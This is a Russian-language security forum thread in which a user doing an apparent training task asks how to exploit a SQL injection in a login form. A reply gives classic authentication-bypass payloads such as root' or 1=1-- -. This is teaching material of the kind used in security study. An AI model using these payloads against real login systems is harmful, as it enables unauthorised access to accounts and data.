• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

SQL иньекция

~localhost

~localhost

Green Team
30.10.2017
230
49
BIT
19
привет делаю задание, вообще туго с иньекциями.
после ввода
login:root ' true --
pass" 1

выдает следующую ошибку: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'true --' and `password` = SHA1( CONCAT('1', `salt`)) limit 1' at line 1

Подскажите как проэксплуатировать?
 
Сортировать по дате Сортировать по голосам
N1GGA

N1GGA

Codeby Team
Platinum
16.07.2018
326
332
BIT
204
В пейлоаде нарушен синтаксис SQL. Поэкспериментируй с этими пейлоадами

root' or true -- - root' or 1=1-- - root' or 'a'='a
 
За 2 Против
Решение
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ